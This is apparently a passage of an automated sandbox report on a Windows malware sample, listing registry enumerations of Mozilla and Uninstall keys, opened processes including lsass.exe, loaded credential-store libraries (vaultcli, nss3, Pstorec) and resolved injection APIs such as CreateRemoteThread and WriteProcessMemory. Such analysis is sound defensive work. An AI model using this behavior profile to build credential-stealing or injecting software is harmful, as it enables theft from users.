Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	-	1	Fn

Process (2378)

Operation	Process	Additional Information	Count	Logfile
Open	System	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\program files\uninstall information\devon stickers.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_QUERY_INFORMATION	72	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	74	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe	desired_access = PROCESS_QUERY_INFORMATION	76	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_QUERY_INFORMATION	72	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\google\luxury-westminster-editing-cube.exe	desired_access = PROCESS_QUERY_INFORMATION	76	Fn
Open	c:\program files\windows photo viewer\eagles_podcast_type_marker.exe	desired_access = PROCESS_QUERY_INFORMATION	76	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	76	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	52	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	52	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	52	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	52	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	52	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	50	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	5	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	5	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	5	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	5	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	4	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	36	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	36	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	36	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	36	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	36	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	5	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	40	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn

Module (884)

Operation	Module	Additional Information	Count	Logfile
Load	KERNEL32.dll	base_address = 0x759c0000	2	Fn
Load	USER32.dll	base_address = 0x758c0000	2	Fn
Load	CRYPT32.dll	base_address = 0x76240000	2	Fn
Load	ADVAPI32.dll	base_address = 0x77740000	2	Fn
Load	SHELL32.dll	base_address = 0x76a70000	2	Fn
Load	SHLWAPI.dll	base_address = 0x76370000	2	Fn
Load	PSAPI.DLL	base_address = 0x75ad0000	1	Fn
Load	ole32.dll	base_address = 0x75ae0000	2	Fn
Load	GDI32.dll	base_address = 0x76950000	1	Fn
Load	WININET.dll	base_address = 0x75f20000	2	Fn
Load	urlmon.dll	base_address = 0x76690000	1	Fn
Load	OLEAUT32.dll	base_address = 0x761b0000	1	Fn
Load	Secur32.dll	base_address = 0x75690000	2	Fn
Load	MSVCRT.dll	base_address = 0x75e70000	1	Fn
Load	Pstorec.dll	base_address = 0x74f10000	1	Fn
Load	vaultcli.dll	base_address = 0x74ea0000	1	Fn
Load	nss3.dll	base_address = 0x74490000	1	Fn
Load	Pstorec.dll	base_address = 0x74290000	1	Fn
Load	cabinet.dll	base_address = 0x75100000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77cb0000	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x759d7a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x759d49d7	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x759d89b3	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77cf1f6e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x759e10b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x759d34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77cde026	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x759d35b7	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x759ed9b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x759d2d3c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ce45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x759ddd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x759d14e9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x759d5a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x759fd4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x759d103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x759d170d	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x759d1400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x759d5a96	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x759ed9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x759fd075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x759ed5cd	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x759d5151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x759ece2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x759d17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x759d469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x759d1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x759d1b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x759d1ae5	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x759d1886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x759d1245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x77d2742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x759d7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x759d11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x759f830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x759d3e8e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x759d195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x759ed851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x759f5c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x759fc7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a5416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a5414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a541df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a540fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x759d5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x759d418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x759d44ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x759f3b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x759d1b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x759d17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77ce2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x759d465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x759d192e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x759ed4f7	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x759d1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x759d4407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x759d111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77cd2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x759d4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x759eecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a544cf	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x759d1856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x759d4173	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x759d1282	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x759d54ee	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77cd22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x759d1b18	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x759d4442	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x759d15d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x759ed4dc	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x759d11a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x759d14c9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x759d4a2d	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x759ed9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x759d59e2	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x759d4435	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x759d1462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x759ec860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x759d3ed3	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x759d4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x759d34c8	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x759d34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x759d1222	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x759d492b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x759f8baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x759f896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x759d11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x759f735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x759d3f5c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x759d424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x759d16dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x759d1410	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x759d16c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x759d10ff	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x759d183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x759d1136	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x759d4220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x759d110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x759d186e	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x758e49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x758e8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x758dfbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x758e1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ce25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x758d8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x758d9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x758e2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x758e3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75931a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x758d7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x758e05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x758d787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x758db17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x758e6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x758dd156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x758df350	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x758d9a55	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x76256c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x7624d718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7775469d	2	Fn
